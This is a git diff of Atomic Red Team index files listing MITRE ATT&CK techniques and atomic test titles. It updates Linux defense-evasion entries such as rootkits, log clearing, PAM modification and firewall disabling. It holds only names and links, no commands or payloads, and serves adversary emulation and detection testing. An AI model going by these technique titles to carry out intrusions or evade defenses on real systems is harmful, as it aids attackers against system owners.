+- T1558.005 Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md)
   - Atomic Test #1: Rubeus asreproast [windows]
   - Atomic Test #2: Get-DomainUser with PowerView [windows]
@@ -2167,6 +2183,7 @@
 - [T1552 Unsecured Credentials](../../T1552/T1552.md)
   - Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos, iaas:aws]
   - Atomic Test #2: Search for Passwords in Powershell History [windows]
+- T1557.004 Evil Twin [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
   - Atomic Test #1: Run Chrome-password Collector [windows]
@@ -2774,6 +2791,8 @@
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1485.001 Lifecycle-Triggered Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.003 SMS Pumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2790,10 +2809,13 @@
 - T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.002 Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1657 Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
   - Atomic Test #1: Replace Desktop Wallpaper [windows]
   - Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
+- T1496.004 Cloud Service Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1531 Account Access Removal](../../T1531/T1531.md)
   - Atomic Test #1: Change User Password - Windows [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 6c82b248b1..8ce604e24b 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -1,28 +1,14 @@
 # Linux Atomic Tests by ATT&CK Tactic & Technique
 # defense-evasion
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.011 Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.011 Signed Binary Proxy Execution: Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
-  - Atomic Test #1: Malicious PAM rule [linux]
-  - Atomic Test #2: Malicious PAM rule (freebsd) [linux]
-  - Atomic Test #3: Malicious PAM module [linux]
 - T1564.012 File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
-  - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
-  - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
-  - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
-  - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
-  - Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
-  - Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
-  - Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
-  - Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
-  - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
-  - Atomic Test #10: chflags - Remove immutable file attribute [linux]
-  - Atomic Test #11: Chmod through c script [macos, linux]
-  - Atomic Test #12: Chmod through c script (freebsd) [linux]
-  - Atomic Test #13: Chown through c script [macos, linux]
-  - Atomic Test #14: Chown through c script (freebsd) [linux]
+- T1216.001 Signed Script Proxy Execution: Pubprn [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1006 Direct Volume Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1014 Rootkit](../../T1014/T1014.md)
@@ -30,33 +16,29 @@
   - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
   - Atomic Test #3: dynamic-linker based rootkit (libprocesshider) [linux]
   - Atomic Test #4: Loadable Kernel Module based Rootkit (Diamorphine) [linux]
-- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
-  - Atomic Test #1: Sudo usage [macos, linux]
-  - Atomic Test #2: Sudo usage (freebsd) [linux]
-  - Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
-  - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
-  - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
-  - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
+- T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
   - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.009 Impair Defenses: Safe Boot Mode [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
   - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
-- [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
-  - Atomic Test #1: rm -rf [macos, linux]
-  - Atomic Test #2: rm -rf [linux]
-  - Atomic Test #5: Truncate system log files via truncate utility (freebsd) [linux]
-  - Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [linux]
-  - Atomic Test #10: Overwrite FreeBSD system log via echo utility [linux]
-  - Atomic Test #13: Delete system log files via unlink utility (freebsd) [linux]
-  - Atomic Test #18: Delete system journal logs via rm and journalctl utilities [linux]
-  - Atomic Test #19: Overwrite Linux Mail Spool [linux]
-  - Atomic Test #20: Overwrite Linux Log [linux]
+- T1218.004 Signed Binary Proxy Execution: InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1036.009 Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.007 Signed Binary Proxy Execution: Msiexec [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
   - Atomic Test #1: Clear Bash history (rm) [linux, macos]
@@ -69,6 +51,7 @@
   - Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
   - Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
   - Atomic Test #10: Clear Docker Container Logs [linux]
+- T1202 Indirect Command Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
   - Atomic Test #3: Base64 decoding with Python [linux, macos]
   - Atomic Test #4: Base64 decoding with Perl [linux, macos]
@@ -81,6 +64,7 @@
 - [T1562 Impair Defenses](../../T1562/T1562.md)
   - Atomic Test #2: Disable journal logging via systemctl utility [linux]
   - Atomic Test #3: Disable journal logging via sed utility [linux]
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.008 Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)
   - Atomic Test #2: Copy and Delete Mailbox Data on Linux [linux]
@@ -94,9 +78,14 @@
   - Atomic Test #3: Set a file's creation timestamp [linux, macos]
   - Atomic Test #4: Modify file timestamps using reference file [linux, macos]
 - T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480.002 Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.011 Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1497.003 Time Based Evasion](../../T1497.003/T1497.003.md)
   - Atomic Test #1: Delay execution with ping [linux, macos]
+- T1218.003 Signed Binary Proxy Execution: CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.002 Impair Defenses: Disable Windows Event Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.002 Signed Binary Proxy Execution: Control Panel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
   - Atomic Test #7: Stop/Start UFW firewall [linux]
   - Atomic Test #8: Stop/Start Packet Filter [linux]
@@ -111,30 +100,25 @@
   - Atomic Test #17: Tail the UFW firewall log file [linux]
   - Atomic Test #18: Disable iptables [linux]
   - Atomic Test #19: Modify/delete iptables firewall rules [linux]
+- T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1218.015 Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1562.012 Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md)
-  - Atomic Test #1: Delete all auditd rules using auditctl [linux]
-  - Atomic Test #2: Disable auditd using auditctl [linux]
+- T1207 Rogue Domain Controller [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.006 Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1112 Modify Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
   - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
   - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
-  - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
-  - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
+- T1070.001 Indicator Removal on Host: Clear Windows Event Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
-  - Atomic Test #1: Make and modify binary from C source [macos, linux]
-  - Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
-  - Atomic Test #3: Set a SetUID flag on file [macos, linux]
-  - Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
-  - Atomic Test #5: Set a SetGID flag on file [macos, linux]
-  - Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
-  - Atomic Test #7: Make and modify capabilities of a binary [linux]
-  - Atomic Test #8: Provide the SetUID capability to a file [linux]
-  - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
-  - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.008 Signed Binary Proxy Execution: Odbcconf [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
   - Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
   - Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [linux]
@@ -143,16 +127,25 @@
 - T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1036.004 Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md)
   - Atomic Test #3: linux rename /proc/pid/comm using prctl [linux]
   - Atomic Test #4: Hiding a malicious process with bind mounts [linux]
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.010 Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md)
   - Atomic Test #1: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI [linux]
 - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.005 Signed Binary Proxy Execution: Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.012 LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.003 Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md)
   - Atomic Test #1: Disable history collection [linux, macos]
   - Atomic Test #2: Disable history collection (freebsd) [linux]
@@ -164,8 +157,13 @@
   - Atomic Test #8: Setting the HISTFILE environment variable [linux]
   - Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux]
   - Atomic Test #10: Setting the HISTIGNORE environment variable [linux]
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.001 Signed Binary Proxy Execution: Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.005 Indicator Removal on Host: Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
   - Atomic Test #1: Disable syslog [linux]
   - Atomic Test #2: Disable syslog (freebsd) [linux]
@@ -182,16 +180,23 @@
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
   - Atomic Test #1: Decode base64 Data into Script [macos, linux]
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.014 Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.010 Signed Binary Proxy Execution: Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
   - Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [linux]
 - T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
   - Atomic Test #1: Install root CA on CentOS/RHEL [linux]
   - Atomic Test #2: Install root CA on FreeBSD [linux]
@@ -201,29 +206,45 @@
   - Atomic Test #4: CC compile [linux, macos]
   - Atomic Test #5: Go compile [linux, macos]
 - T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1656 Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.002 ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.010 Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
   - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
   - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
   - Atomic Test #3: Overwrite and delete a file with shred [linux]
   - Atomic Test #8: Delete Filesystem - Linux [linux]
+- T1221 Template Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
   - Atomic Test #1: Binary simply packed by UPX (linux) [linux]
   - Atomic Test #2: Binary packed by UPX, with modified headers (linux) [linux]
 - T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
-  - Atomic Test #2: Space After Filename [macos, linux]
-- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216.002 SyncAppvPublishingServer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.007 Obfuscated Files or Information: Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.015 Process Injection: ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1220 XSL Script Processing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
   - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
 - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.004 Hide Artifacts: NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.001 Process Injection: Dynamic-link Library Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
